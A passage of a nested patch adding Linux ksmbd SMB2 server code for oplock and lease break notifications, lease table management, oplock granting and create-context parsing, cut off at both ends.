++		wait_on_bit(&opinfo->pending_break, 0, TASK_UNINTERRUPTIBLE);
++
++		/* Not immediately break to none. */
++		opinfo->open_trunc = 0;
++
++		if (opinfo->op_state == OPLOCK_CLOSING)
++			return -ENOENT;
++		else if (!opinfo->is_lease && opinfo->level <= req_op_level)
++			return 1;
++	}
++
++	if (!opinfo->is_lease && opinfo->level <= req_op_level) {
++		wake_up_oplock_break(opinfo);
++		return 1;
++	}
++	return 0;
++}
++
++static inline int allocate_oplock_break_buf(struct ksmbd_work *work)
++{
++	work->response_buf = kzalloc(MAX_CIFS_SMALL_BUFFER_SIZE, GFP_KERNEL);
++	if (!work->response_buf)
++		return -ENOMEM;
++	work->response_sz = MAX_CIFS_SMALL_BUFFER_SIZE;
++	return 0;
++}
++
++/**
++ * __smb2_oplock_break_noti() - send smb2 oplock break cmd from conn
++ * to client
++ * @wk:     smb work object
++ *
++ * There are two ways this function can be called. 1- while file open we break
++ * from exclusive/batch lock to levelII oplock and 2- while file write/truncate
++ * we break from levelII oplock no oplock.
++ * work->request_buf contains oplock_info.
++ */
++static void __smb2_oplock_break_noti(struct work_struct *wk)
++{
++	struct smb2_oplock_break *rsp = NULL;
++	struct ksmbd_work *work = container_of(wk, struct ksmbd_work, work);
++	struct ksmbd_conn *conn = work->conn;
++	struct oplock_break_info *br_info = work->request_buf;
++	struct smb2_hdr *rsp_hdr;
++	struct ksmbd_file *fp;
++
++	fp = ksmbd_lookup_durable_fd(br_info->fid);
++	if (!fp)
++		goto out;
++
++	if (allocate_oplock_break_buf(work)) {
++		pr_err("smb2_allocate_rsp_buf failed! ");
++		ksmbd_fd_put(work, fp);
++		goto out;
++	}
++
++	rsp_hdr = smb2_get_msg(work->response_buf);
++	memset(rsp_hdr, 0, sizeof(struct smb2_hdr) + 2);
++	*(__be32 *)work->response_buf =
++		cpu_to_be32(conn->vals->header_size);
++	rsp_hdr->ProtocolId = SMB2_PROTO_NUMBER;
++	rsp_hdr->StructureSize = SMB2_HEADER_STRUCTURE_SIZE;
++	rsp_hdr->CreditRequest = cpu_to_le16(0);
++	rsp_hdr->Command = SMB2_OPLOCK_BREAK;
++	rsp_hdr->Flags = (SMB2_FLAGS_SERVER_TO_REDIR);
++	rsp_hdr->NextCommand = 0;
++	rsp_hdr->MessageId = cpu_to_le64(-1);
++	rsp_hdr->Id.SyncId.ProcessId = 0;
++	rsp_hdr->Id.SyncId.TreeId = 0;
++	rsp_hdr->SessionId = 0;
++	memset(rsp_hdr->Signature, 0, 16);
++
++	rsp = smb2_get_msg(work->response_buf);
++
++	rsp->StructureSize = cpu_to_le16(24);
++	if (!br_info->open_trunc &&
++	    (br_info->level == SMB2_OPLOCK_LEVEL_BATCH ||
++	     br_info->level == SMB2_OPLOCK_LEVEL_EXCLUSIVE))
++		rsp->OplockLevel = SMB2_OPLOCK_LEVEL_II;
++	else
++		rsp->OplockLevel = SMB2_OPLOCK_LEVEL_NONE;
++	rsp->Reserved = 0;
++	rsp->Reserved2 = 0;
++	rsp->PersistentFid = fp->persistent_id;
++	rsp->VolatileFid = fp->volatile_id;
++
++	inc_rfc1001_len(work->response_buf, 24);
++
++	ksmbd_debug(OPLOCK,
++		    "sending oplock break v_id %llu p_id = %llu lock level = %d\n",
++		    rsp->VolatileFid, rsp->PersistentFid, rsp->OplockLevel);
++
++	ksmbd_fd_put(work, fp);
++	ksmbd_conn_write(work);
++
++out:
++	ksmbd_free_work_struct(work);
++}
++
++/**
++ * smb2_oplock_break_noti() - send smb2 exclusive/batch to level2 oplock
++ *		break command from server to client
++ * @opinfo:		oplock info object
++ *
++ * Return:      0 on success, otherwise error
++ */
++static int smb2_oplock_break_noti(struct oplock_info *opinfo)
++{
++	struct ksmbd_conn *conn = opinfo->conn;
++	struct oplock_break_info *br_info;
++	int ret = 0;
++	struct ksmbd_work *work = ksmbd_alloc_work_struct();
++
++	if (!work)
++		return -ENOMEM;
++
++	br_info = kmalloc(sizeof(struct oplock_break_info), GFP_KERNEL);
++	if (!br_info) {
++		ksmbd_free_work_struct(work);
++		return -ENOMEM;
++	}
++
++	br_info->level = opinfo->level;
++	br_info->fid = opinfo->fid;
++	br_info->open_trunc = opinfo->open_trunc;
++
++	work->request_buf = (char *)br_info;
++	work->conn = conn;
++	work->sess = opinfo->sess;
++
++	if (opinfo->op_state == OPLOCK_ACK_WAIT) {
++		INIT_WORK(&work->work, __smb2_oplock_break_noti);
++		ksmbd_queue_work(work);
++
++		wait_for_break_ack(opinfo);
++	} else {
++		__smb2_oplock_break_noti(&work->work);
++		if (opinfo->level == SMB2_OPLOCK_LEVEL_II)
++			opinfo->level = SMB2_OPLOCK_LEVEL_NONE;
++	}
++	return ret;
++}
++
++/**
++ * __smb2_lease_break_noti() - send lease break command from server
++ * to client
++ * @wk:     smb work object
++ */
++static void __smb2_lease_break_noti(struct work_struct *wk)
++{
++	struct smb2_lease_break *rsp = NULL;
++	struct ksmbd_work *work = container_of(wk, struct ksmbd_work, work);
++	struct lease_break_info *br_info = work->request_buf;
++	struct ksmbd_conn *conn = work->conn;
++	struct smb2_hdr *rsp_hdr;
++
++	if (allocate_oplock_break_buf(work)) {
++		ksmbd_debug(OPLOCK, "smb2_allocate_rsp_buf failed! ");
++		goto out;
++	}
++
++	rsp_hdr = smb2_get_msg(work->response_buf);
++	memset(rsp_hdr, 0, sizeof(struct smb2_hdr) + 2);
++	*(__be32 *)work->response_buf =
++		cpu_to_be32(conn->vals->header_size);
++	rsp_hdr->ProtocolId = SMB2_PROTO_NUMBER;
++	rsp_hdr->StructureSize = SMB2_HEADER_STRUCTURE_SIZE;
++	rsp_hdr->CreditRequest = cpu_to_le16(0);
++	rsp_hdr->Command = SMB2_OPLOCK_BREAK;
++	rsp_hdr->Flags = (SMB2_FLAGS_SERVER_TO_REDIR);
++	rsp_hdr->NextCommand = 0;
++	rsp_hdr->MessageId = cpu_to_le64(-1);
++	rsp_hdr->Id.SyncId.ProcessId = 0;
++	rsp_hdr->Id.SyncId.TreeId = 0;
++	rsp_hdr->SessionId = 0;
++	memset(rsp_hdr->Signature, 0, 16);
++
++	rsp = smb2_get_msg(work->response_buf);
++	rsp->StructureSize = cpu_to_le16(44);
++	rsp->Epoch = br_info->epoch;
++	rsp->Flags = 0;
++
++	if (br_info->curr_state & (SMB2_LEASE_WRITE_CACHING_LE |
++			SMB2_LEASE_HANDLE_CACHING_LE))
++		rsp->Flags = SMB2_NOTIFY_BREAK_LEASE_FLAG_ACK_REQUIRED;
++
++	memcpy(rsp->LeaseKey, br_info->lease_key, SMB2_LEASE_KEY_SIZE);
++	rsp->CurrentLeaseState = br_info->curr_state;
++	rsp->NewLeaseState = br_info->new_state;
++	rsp->BreakReason = 0;
++	rsp->AccessMaskHint = 0;
++	rsp->ShareMaskHint = 0;
++
++	inc_rfc1001_len(work->response_buf, 44);
++
++	ksmbd_conn_write(work);
++
++out:
++	ksmbd_free_work_struct(work);
++}
++
++/**
++ * smb2_lease_break_noti() - break lease when a new client request
++ *			write lease
++ * @opinfo:		conains lease state information
++ *
++ * Return:	0 on success, otherwise error
++ */
++static int smb2_lease_break_noti(struct oplock_info *opinfo)
++{
++	struct ksmbd_conn *conn = opinfo->conn;
++	struct list_head *tmp, *t;
++	struct ksmbd_work *work;
++	struct lease_break_info *br_info;
++	struct lease *lease = opinfo->o_lease;
++
++	work = ksmbd_alloc_work_struct();
++	if (!work)
++		return -ENOMEM;
++
++	br_info = kmalloc(sizeof(struct lease_break_info), GFP_KERNEL);
++	if (!br_info) {
++		ksmbd_free_work_struct(work);
++		return -ENOMEM;
++	}
++
++	br_info->curr_state = lease->state;
++	br_info->new_state = lease->new_state;
++	if (lease->version == 2)
++		br_info->epoch = cpu_to_le16(++lease->epoch);
++	else
++		br_info->epoch = 0;
++	memcpy(br_info->lease_key, lease->lease_key, SMB2_LEASE_KEY_SIZE);
++
++	work->request_buf = (char *)br_info;
++	work->conn = conn;
++	work->sess = opinfo->sess;
++
++	if (opinfo->op_state == OPLOCK_ACK_WAIT) {
++		list_for_each_safe(tmp, t, &opinfo->interim_list) {
++			struct ksmbd_work *in_work;
++
++			in_work = list_entry(tmp, struct ksmbd_work,
++					     interim_entry);
++			setup_async_work(in_work, NULL, NULL);
++			smb2_send_interim_resp(in_work, STATUS_PENDING);
++			list_del(&in_work->interim_entry);
++		}
++		INIT_WORK(&work->work, __smb2_lease_break_noti);
++		ksmbd_queue_work(work);
++		wait_for_break_ack(opinfo);
++	} else {
++		__smb2_lease_break_noti(&work->work);
++		if (opinfo->o_lease->new_state == SMB2_LEASE_NONE_LE) {
++			opinfo->level = SMB2_OPLOCK_LEVEL_NONE;
++			opinfo->o_lease->state = SMB2_LEASE_NONE_LE;
++		}
++	}
++	return 0;
++}
++
++static void wait_lease_breaking(struct oplock_info *opinfo)
++{
++	if (!opinfo->is_lease)
++		return;
++
++	wake_up_interruptible_all(&opinfo->oplock_brk);
++	if (atomic_read(&opinfo->breaking_cnt)) {
++		int ret = 0;
++
++		ret = wait_event_interruptible_timeout(opinfo->oplock_brk,
++						       atomic_read(&opinfo->breaking_cnt) == 0,
++						       HZ);
++		if (!ret)
++			atomic_set(&opinfo->breaking_cnt, 0);
++	}
++}
++
++static int oplock_break(struct oplock_info *brk_opinfo, int req_op_level)
++{
++	int err = 0;
++
++	/* Need to break exclusive/batch oplock, write lease or overwrite_if */
++	ksmbd_debug(OPLOCK,
++		    "request to send oplock(level : 0x%x) break notification\n",
++		    brk_opinfo->level);
++
++	if (brk_opinfo->is_lease) {
++		struct lease *lease = brk_opinfo->o_lease;
++
++		atomic_inc(&brk_opinfo->breaking_cnt);
++
++		err = oplock_break_pending(brk_opinfo, req_op_level);
++		if (err)
++			return err < 0 ? err : 0;
++
++		if (brk_opinfo->open_trunc) {
++			/*
++			 * Create overwrite break trigger the lease break to
++			 * none.
++			 */
++			lease->new_state = SMB2_LEASE_NONE_LE;
++		} else {
++			if (lease->state & SMB2_LEASE_WRITE_CACHING_LE) {
++				if (lease->state & SMB2_LEASE_HANDLE_CACHING_LE)
++					lease->new_state =
++						SMB2_LEASE_READ_CACHING_LE |
++						SMB2_LEASE_HANDLE_CACHING_LE;
++				else
++					lease->new_state =
++						SMB2_LEASE_READ_CACHING_LE;
++			} else {
++				if (lease->state & SMB2_LEASE_HANDLE_CACHING_LE)
++					lease->new_state =
++						SMB2_LEASE_READ_CACHING_LE;
++				else
++					lease->new_state = SMB2_LEASE_NONE_LE;
++			}
++		}
++
++		if (lease->state & (SMB2_LEASE_WRITE_CACHING_LE |
++				SMB2_LEASE_HANDLE_CACHING_LE))
++			brk_opinfo->op_state = OPLOCK_ACK_WAIT;
++		else
++			atomic_dec(&brk_opinfo->breaking_cnt);
++	} else {
++		err = oplock_break_pending(brk_opinfo, req_op_level);
++		if (err)
++			return err < 0 ? err : 0;
++
++		if (brk_opinfo->level == SMB2_OPLOCK_LEVEL_BATCH ||
++		    brk_opinfo->level == SMB2_OPLOCK_LEVEL_EXCLUSIVE)
++			brk_opinfo->op_state = OPLOCK_ACK_WAIT;
++	}
++
++	if (brk_opinfo->is_lease)
++		err = smb2_lease_break_noti(brk_opinfo);
++	else
++		err = smb2_oplock_break_noti(brk_opinfo);
++
++	ksmbd_debug(OPLOCK, "oplock granted = %d\n", brk_opinfo->level);
++	if (brk_opinfo->op_state == OPLOCK_CLOSING)
++		err = -ENOENT;
++	wake_up_oplock_break(brk_opinfo);
++
++	wait_lease_breaking(brk_opinfo);
++
++	return err;
++}
++
++void destroy_lease_table(struct ksmbd_conn *conn)
++{
++	struct lease_table *lb, *lbtmp;
++	struct oplock_info *opinfo;
++
++	write_lock(&lease_list_lock);
++	if (list_empty(&lease_table_list)) {
++		write_unlock(&lease_list_lock);
++		return;
++	}
++
++	list_for_each_entry_safe(lb, lbtmp, &lease_table_list, l_entry) {
++		if (conn && memcmp(lb->client_guid, conn->ClientGUID,
++				   SMB2_CLIENT_GUID_SIZE))
++			continue;
++again:
++		rcu_read_lock();
++		list_for_each_entry_rcu(opinfo, &lb->lease_list,
++					lease_entry) {
++			rcu_read_unlock();
++			lease_del_list(opinfo);
++			goto again;
++		}
++		rcu_read_unlock();
++		list_del(&lb->l_entry);
++		kfree(lb);
++	}
++	write_unlock(&lease_list_lock);
++}
++
++int find_same_lease_key(struct ksmbd_session *sess, struct ksmbd_inode *ci,
++			struct lease_ctx_info *lctx)
++{
++	struct oplock_info *opinfo;
++	int err = 0;
++	struct lease_table *lb;
++
++	if (!lctx)
++		return err;
++
++	read_lock(&lease_list_lock);
++	if (list_empty(&lease_table_list)) {
++		read_unlock(&lease_list_lock);
++		return 0;
++	}
++
++	list_for_each_entry(lb, &lease_table_list, l_entry) {
++		if (!memcmp(lb->client_guid, sess->ClientGUID,
++			    SMB2_CLIENT_GUID_SIZE))
++			goto found;
++	}
++	read_unlock(&lease_list_lock);
++
++	return 0;
++
++found:
++	rcu_read_lock();
++	list_for_each_entry_rcu(opinfo, &lb->lease_list, lease_entry) {
++		if (!atomic_inc_not_zero(&opinfo->refcount))
++			continue;
++		rcu_read_unlock();
++		if (opinfo->o_fp->f_ci == ci)
++			goto op_next;
++		err = compare_guid_key(opinfo, sess->ClientGUID,
++				       lctx->lease_key);
++		if (err) {
++			err = -EINVAL;
++			ksmbd_debug(OPLOCK,
++				    "found same lease key is already used in other files\n");
++			opinfo_put(opinfo);
++			goto out;
++		}
++op_next:
++		opinfo_put(opinfo);
++		rcu_read_lock();
++	}
++	rcu_read_unlock();
++
++out:
++	read_unlock(&lease_list_lock);
++	return err;
++}
++
++static void copy_lease(struct oplock_info *op1, struct oplock_info *op2)
++{
++	struct lease *lease1 = op1->o_lease;
++	struct lease *lease2 = op2->o_lease;
++
++	op2->level = op1->level;
++	lease2->state = lease1->state;
++	memcpy(lease2->lease_key, lease1->lease_key,
++	       SMB2_LEASE_KEY_SIZE);
++	lease2->duration = lease1->duration;
++	lease2->flags = lease1->flags;
++}
++
++static int add_lease_global_list(struct oplock_info *opinfo)
++{
++	struct lease_table *lb;
++
++	read_lock(&lease_list_lock);
++	list_for_each_entry(lb, &lease_table_list, l_entry) {
++		if (!memcmp(lb->client_guid, opinfo->conn->ClientGUID,
++			    SMB2_CLIENT_GUID_SIZE)) {
++			opinfo->o_lease->l_lb = lb;
++			lease_add_list(opinfo);
++			read_unlock(&lease_list_lock);
++			return 0;
++		}
++	}
++	read_unlock(&lease_list_lock);
++
++	lb = kmalloc(sizeof(struct lease_table), GFP_KERNEL);
++	if (!lb)
++		return -ENOMEM;
++
++	memcpy(lb->client_guid, opinfo->conn->ClientGUID,
++	       SMB2_CLIENT_GUID_SIZE);
++	INIT_LIST_HEAD(&lb->lease_list);
++	spin_lock_init(&lb->lb_lock);
++	opinfo->o_lease->l_lb = lb;
++	lease_add_list(opinfo);
++	lb_add(lb);
++	return 0;
++}
++
++static void set_oplock_level(struct oplock_info *opinfo, int level,
++			     struct lease_ctx_info *lctx)
++{
++	switch (level) {
++	case SMB2_OPLOCK_LEVEL_BATCH:
++	case SMB2_OPLOCK_LEVEL_EXCLUSIVE:
++		grant_write_oplock(opinfo, level, lctx);
++		break;
++	case SMB2_OPLOCK_LEVEL_II:
++		grant_read_oplock(opinfo, lctx);
++		break;
++	default:
++		grant_none_oplock(opinfo, lctx);
++		break;
++	}
++}
++
++/**
++ * smb_grant_oplock() - handle oplock/lease request on file open
++ * @work:		smb work
++ * @req_op_level:	oplock level
++ * @pid:		id of open file
++ * @fp:			ksmbd file pointer
++ * @tid:		Tree id of connection
++ * @lctx:		lease context information on file open
++ * @share_ret:		share mode
++ *
++ * Return:      0 on success, otherwise error
++ */
++int smb_grant_oplock(struct ksmbd_work *work, int req_op_level, u64 pid,
++		     struct ksmbd_file *fp, __u16 tid,
++		     struct lease_ctx_info *lctx, int share_ret)
++{
++	struct ksmbd_session *sess = work->sess;
++	int err = 0;
++	struct oplock_info *opinfo = NULL, *prev_opinfo = NULL;
++	struct ksmbd_inode *ci = fp->f_ci;
++	bool prev_op_has_lease;
++	__le32 prev_op_state = 0;
++
++	/* not support directory lease */
++	if (S_ISDIR(file_inode(fp->filp)->i_mode))
++		return 0;
++
++	opinfo = alloc_opinfo(work, pid, tid);
++	if (!opinfo)
++		return -ENOMEM;
++
++	if (lctx) {
++		err = alloc_lease(opinfo, lctx);
++		if (err)
++			goto err_out;
++		opinfo->is_lease = 1;
++	}
++
++	/* ci does not have any oplock */
++	if (!opinfo_count(fp))
++		goto set_lev;
++
++	/* grant none-oplock if second open is trunc */
++	if (fp->attrib_only && fp->cdoption != FILE_OVERWRITE_IF_LE &&
++	    fp->cdoption != FILE_OVERWRITE_LE &&
++	    fp->cdoption != FILE_SUPERSEDE_LE) {
++		req_op_level = SMB2_OPLOCK_LEVEL_NONE;
++		goto set_lev;
++	}
++
++	if (lctx) {
++		struct oplock_info *m_opinfo;
++
++		/* is lease already granted ? */
++		m_opinfo = same_client_has_lease(ci, sess->ClientGUID,
++						 lctx);
++		if (m_opinfo) {
++			copy_lease(m_opinfo, opinfo);
++			if (atomic_read(&m_opinfo->breaking_cnt))
++				opinfo->o_lease->flags =
++					SMB2_LEASE_FLAG_BREAK_IN_PROGRESS_LE;
++			goto out;
++		}
++	}
++	prev_opinfo = opinfo_get_list(ci);
++	if (!prev_opinfo ||
++	    (prev_opinfo->level == SMB2_OPLOCK_LEVEL_NONE && lctx)) {
++		opinfo_conn_put(prev_opinfo);
++		goto set_lev;
++	}
++	prev_op_has_lease = prev_opinfo->is_lease;
++	if (prev_op_has_lease)
++		prev_op_state = prev_opinfo->o_lease->state;
++
++	if (share_ret < 0 &&
++	    prev_opinfo->level == SMB2_OPLOCK_LEVEL_EXCLUSIVE) {
++		err = share_ret;
++		opinfo_conn_put(prev_opinfo);
++		goto err_out;
++	}
++
++	if (prev_opinfo->level != SMB2_OPLOCK_LEVEL_BATCH &&
++	    prev_opinfo->level != SMB2_OPLOCK_LEVEL_EXCLUSIVE) {
++		opinfo_conn_put(prev_opinfo);
++		goto op_break_not_needed;
++	}
++
++	list_add(&work->interim_entry, &prev_opinfo->interim_list);
++	err = oplock_break(prev_opinfo, SMB2_OPLOCK_LEVEL_II);
++	opinfo_conn_put(prev_opinfo);
++	if (err == -ENOENT)
++		goto set_lev;
++	/* Check all oplock was freed by close */
++	else if (err < 0)
++		goto err_out;
++
++op_break_not_needed:
++	if (share_ret < 0) {
++		err = share_ret;
++		goto err_out;
++	}
++
++	if (req_op_level != SMB2_OPLOCK_LEVEL_NONE)
++		req_op_level = SMB2_OPLOCK_LEVEL_II;
++
++	/* grant fixed oplock on stacked locking between lease and oplock */
++	if (prev_op_has_lease && !lctx)
++		if (prev_op_state & SMB2_LEASE_HANDLE_CACHING_LE)
++			req_op_level = SMB2_OPLOCK_LEVEL_NONE;
++
++	if (!prev_op_has_lease && lctx) {
++		req_op_level = SMB2_OPLOCK_LEVEL_II;
++		lctx->req_state = SMB2_LEASE_READ_CACHING_LE;
++	}
++
++set_lev:
++	set_oplock_level(opinfo, req_op_level, lctx);
++
++out:
++	rcu_assign_pointer(fp->f_opinfo, opinfo);
++	opinfo->o_fp = fp;
++
++	opinfo_count_inc(fp);
++	opinfo_add(opinfo);
++	if (opinfo->is_lease) {
++		err = add_lease_global_list(opinfo);
++		if (err)
++			goto err_out;
++	}
++
++	return 0;
++err_out:
++	free_opinfo(opinfo);
++	return err;
++}
++
++/**
++ * smb_break_all_write_oplock() - break batch/exclusive oplock to level2
++ * @work:	smb work
++ * @fp:		ksmbd file pointer
++ * @is_trunc:	truncate on open
++ */
++static void smb_break_all_write_oplock(struct ksmbd_work *work,
++				       struct ksmbd_file *fp, int is_trunc)
++{
++	struct oplock_info *brk_opinfo;
++
++	brk_opinfo = opinfo_get_list(fp->f_ci);
++	if (!brk_opinfo)
++		return;
++	if (brk_opinfo->level != SMB2_OPLOCK_LEVEL_BATCH &&
++	    brk_opinfo->level != SMB2_OPLOCK_LEVEL_EXCLUSIVE) {
++		opinfo_conn_put(brk_opinfo);
++		return;
++	}
++
++	brk_opinfo->open_trunc = is_trunc;
++	list_add(&work->interim_entry, &brk_opinfo->interim_list);
++	oplock_break(brk_opinfo, SMB2_OPLOCK_LEVEL_II);
++	opinfo_conn_put(brk_opinfo);
++}
++
++/**
++ * smb_break_all_levII_oplock() - send level2 oplock or read lease break command
++ *	from server to client
++ * @work:	smb work
++ * @fp:		ksmbd file pointer
++ * @is_trunc:	truncate on open
++ */
++void smb_break_all_levII_oplock(struct ksmbd_work *work, struct ksmbd_file *fp,
++				int is_trunc)
++{
++	struct oplock_info *op, *brk_op;
++	struct ksmbd_inode *ci;
++	struct ksmbd_conn *conn = work->conn;
++
++	if (!test_share_config_flag(work->tcon->share_conf,
++				    KSMBD_SHARE_FLAG_OPLOCKS))
++		return;
++
++	ci = fp->f_ci;
++	op = opinfo_get(fp);
++
++	rcu_read_lock();
++	list_for_each_entry_rcu(brk_op, &ci->m_op_list, op_entry) {
++		if (!atomic_inc_not_zero(&brk_op->refcount))
++			continue;
++
++		atomic_inc(&brk_op->conn->r_count);
++		if (ksmbd_conn_releasing(brk_op->conn)) {
++			atomic_dec(&brk_op->conn->r_count);
++			continue;
++		}
++
++		rcu_read_unlock();
++		if (brk_op->is_lease && (brk_op->o_lease->state &
++		    (~(SMB2_LEASE_READ_CACHING_LE |
++				SMB2_LEASE_HANDLE_CACHING_LE)))) {
++			ksmbd_debug(OPLOCK, "unexpected lease state(0x%x)\n",
++				    brk_op->o_lease->state);
++			goto next;
++		} else if (brk_op->level !=
++				SMB2_OPLOCK_LEVEL_II) {
++			ksmbd_debug(OPLOCK, "unexpected oplock(0x%x)\n",
++				    brk_op->level);
++			goto next;
++		}
++
++		/* Skip oplock being break to none */
++		if (brk_op->is_lease &&
++		    brk_op->o_lease->new_state == SMB2_LEASE_NONE_LE &&
++		    atomic_read(&brk_op->breaking_cnt))
++			goto next;
++
++		if (op && op->is_lease && brk_op->is_lease &&
++		    !memcmp(conn->ClientGUID, brk_op->conn->ClientGUID,
++			    SMB2_CLIENT_GUID_SIZE) &&
++		    !memcmp(op->o_lease->lease_key, brk_op->o_lease->lease_key,
++			    SMB2_LEASE_KEY_SIZE))
++			goto next;
++		brk_op->open_trunc = is_trunc;
++		oplock_break(brk_op, SMB2_OPLOCK_LEVEL_NONE);
++next:
++		opinfo_conn_put(brk_op);
++		rcu_read_lock();
++	}
++	rcu_read_unlock();
++
++	if (op)
++		opinfo_put(op);
++}
++
++/**
++ * smb_break_all_oplock() - break both batch/exclusive and level2 oplock
++ * @work:	smb work
++ * @fp:		ksmbd file pointer
++ */
++void smb_break_all_oplock(struct ksmbd_work *work, struct ksmbd_file *fp)
++{
++	if (!test_share_config_flag(work->tcon->share_conf,
++				    KSMBD_SHARE_FLAG_OPLOCKS))
++		return;
++
++	smb_break_all_write_oplock(work, fp, 1);
++	smb_break_all_levII_oplock(work, fp, 1);
++}
++
++/**
++ * smb2_map_lease_to_oplock() - map lease state to corresponding oplock type
++ * @lease_state:     lease type
++ *
++ * Return:      0 if no mapping, otherwise corresponding oplock type
++ */
++__u8 smb2_map_lease_to_oplock(__le32 lease_state)
++{
++	if (lease_state == (SMB2_LEASE_HANDLE_CACHING_LE |
++			    SMB2_LEASE_READ_CACHING_LE |
++			    SMB2_LEASE_WRITE_CACHING_LE)) {
++		return SMB2_OPLOCK_LEVEL_BATCH;
++	} else if (lease_state != SMB2_LEASE_WRITE_CACHING_LE &&
++		 lease_state & SMB2_LEASE_WRITE_CACHING_LE) {
++		if (!(lease_state & SMB2_LEASE_HANDLE_CACHING_LE))
++			return SMB2_OPLOCK_LEVEL_EXCLUSIVE;
++	} else if (lease_state & SMB2_LEASE_READ_CACHING_LE) {
++		return SMB2_OPLOCK_LEVEL_II;
++	}
++	return 0;
++}
++
++/**
++ * create_lease_buf() - create lease context for open cmd response
++ * @rbuf:	buffer to create lease context response
++ * @lease:	buffer to stored parsed lease state information
++ */
++void create_lease_buf(u8 *rbuf, struct lease *lease)
++{
++	if (lease->version == 2) {
++		struct create_lease_v2 *buf = (struct create_lease_v2 *)rbuf;
++
++		memset(buf, 0, sizeof(struct create_lease_v2));
++		memcpy(buf->lcontext.LeaseKey, lease->lease_key,
++		       SMB2_LEASE_KEY_SIZE);
++		buf->lcontext.LeaseFlags = lease->flags;
++		buf->lcontext.LeaseState = lease->state;
++		memcpy(buf->lcontext.ParentLeaseKey, lease->parent_lease_key,
++		       SMB2_LEASE_KEY_SIZE);
++		buf->ccontext.DataOffset = cpu_to_le16(offsetof
++				(struct create_lease_v2, lcontext));
++		buf->ccontext.DataLength = cpu_to_le32(sizeof(struct lease_context_v2));
++		buf->ccontext.NameOffset = cpu_to_le16(offsetof
++				(struct create_lease_v2, Name));
++		buf->ccontext.NameLength = cpu_to_le16(4);
++		buf->Name[0] = 'R';
++		buf->Name[1] = 'q';
++		buf->Name[2] = 'L';
++		buf->Name[3] = 's';
++	} else {
++		struct create_lease *buf = (struct create_lease *)rbuf;
++
++		memset(buf, 0, sizeof(struct create_lease));
++		memcpy(buf->lcontext.LeaseKey, lease->lease_key, SMB2_LEASE_KEY_SIZE);
++		buf->lcontext.LeaseFlags = lease->flags;
++		buf->lcontext.LeaseState = lease->state;
++		buf->ccontext.DataOffset = cpu_to_le16(offsetof
++				(struct create_lease, lcontext));
++		buf->ccontext.DataLength = cpu_to_le32(sizeof(struct lease_context));
++		buf->ccontext.NameOffset = cpu_to_le16(offsetof
++				(struct create_lease, Name));
++		buf->ccontext.NameLength = cpu_to_le16(4);
++		buf->Name[0] = 'R';
++		buf->Name[1] = 'q';
++		buf->Name[2] = 'L';
++		buf->Name[3] = 's';
++	}
++}
++
++/**
++ * parse_lease_state() - parse lease context containted in file open request
++ * @open_req:	buffer containing smb2 file open(create) request
++ *
++ * Return:  oplock state, -ENOENT if create lease context not found
++ */
++struct lease_ctx_info *parse_lease_state(void *open_req)
++{
++	struct create_context *cc;
++	struct smb2_create_req *req = (struct smb2_create_req *)open_req;
++	struct lease_ctx_info *lreq;
++
++	cc = smb2_find_context_vals(req, SMB2_CREATE_REQUEST_LEASE, 4);
++	if (IS_ERR_OR_NULL(cc))
++		return NULL;
++
++	lreq = kzalloc(sizeof(struct lease_ctx_info), GFP_KERNEL);
++	if (!lreq)
++		return NULL;
++
++	if (sizeof(struct lease_context_v2) == le32_to_cpu(cc->DataLength)) {
++		struct create_lease_v2 *lc = (struct create_lease_v2 *)cc;
++
++		memcpy(lreq->lease_key, lc->lcontext.LeaseKey, SMB2_LEASE_KEY_SIZE);
++		lreq->req_state = lc->lcontext.LeaseState;
++		lreq->flags = lc->lcontext.LeaseFlags;
++		lreq->duration = lc->lcontext.LeaseDuration;
++		memcpy(lreq->parent_lease_key, lc->lcontext.ParentLeaseKey,
++				SMB2_LEASE_KEY_SIZE);
++		lreq->version = 2;
++	} else {
++		struct create_lease *lc = (struct create_lease *)cc;
++
++		memcpy(lreq->lease_key, lc->lcontext.LeaseKey, SMB2_LEASE_KEY_SIZE);
++		lreq->req_state = lc->lcontext.LeaseState;
++		lreq->flags = lc->lcontext.LeaseFlags;
++		lreq->duration = lc->lcontext.LeaseDuration;
++		lreq->version = 1;
++	}
++	return lreq;
++}
++
++/**
++ * smb2_find_context_vals() - find a particular context info in open request
++ * @open_req:	buffer containing smb2 file open(create) request
++ * @tag:	context name to search for
++ * @tag_len:	the length of tag
++ *
++ * Return:	pointer to requested context, NULL if @str context not found
++ *		or error pointer if name length is invalid.
++ */
++struct create_context *smb2_find_context_vals(void *open_req, const char *tag, int tag_len)
++{
++	struct create_context *cc;
++	unsigned int next = 0;
++	char *name;
++	struct smb2_create_req *req = (struct smb2_create_req *)open_req;
++	unsigned int remain_len, name_off, name_len, value_off, value_len,
++		     cc_len;
++
++	/*
++	 * CreateContextsOffset and CreateContextsLength are guaranteed to
++	 * be valid because of ksmbd_smb2_check_message().
++	 */
++	cc = (struct create_context *)((char *)req +
++				       le32_to_cpu(req->CreateContextsOffset));
++	remain_len = le32_to_cpu(req->CreateContextsLength);
++	do {
++		cc = (struct create_context *)((char *)cc + next);
++		if (remain_len < offsetof(struct create_context, Buffer))
++			return ERR_PTR(-EINVAL);
++
++		next = le32_to_cpu(cc->Next);
++		name_off = le16_to_cpu(cc->NameOffset);
++		name_len = le16_to_cpu(cc->NameLength);
++		value_off = le16_to_cpu(cc->DataOffset);
++		value_len = le32_to_cpu(cc->DataLength);
++		cc_len = next ? next : remain_len;
++
++		if ((next & 0x7) != 0 ||
++		    next > remain_len ||
++		    name_off != offsetof(struct create_context, Buffer) ||
++		    name_len < 4 ||
++		    name_off + name_len > cc_len ||
++		    (value_off & 0x7) != 0 ||
++		    (value_off && (value_off < name_off + name_len)) ||
++		    ((u64)value_off + value_len > cc_len))
++			return ERR_PTR(-EINVAL);
++
++		name = (char *)cc + name_off;
++		if (name_len == tag_len && !memcmp(name, tag, name_len))
++			return cc;
++
++		remain_len -= next;
++	} while (next != 0);
++
++	return NULL;
++}
++
++/**
++ * create_durable_rsp_buf() - create durable handle context
++ * @cc:	buffer to create durable context response
++ */
++void create_durable_rsp_buf(char *cc)
++{
++	struct create_durable_rsp *buf;
++
++	buf = (struct create_durable_rsp *)cc;
++	memset(buf, 0, sizeof(struct create_durable_rsp));
++	buf->ccontext.DataOffset = cpu_to_le16(offsetof
++			(struct create_durable_rsp, Data));
++	buf->ccontext.DataLength = cpu_to_le32(8);
++	buf->ccontext.NameOffset = cpu_to_le16(offsetof
++			(struct create_durable_rsp, Name));
++	buf->ccontext.NameLength = cpu_to_le16(4);
++	/* SMB2_CREATE_DURABLE_HANDLE_RESPONSE is "DHnQ" */
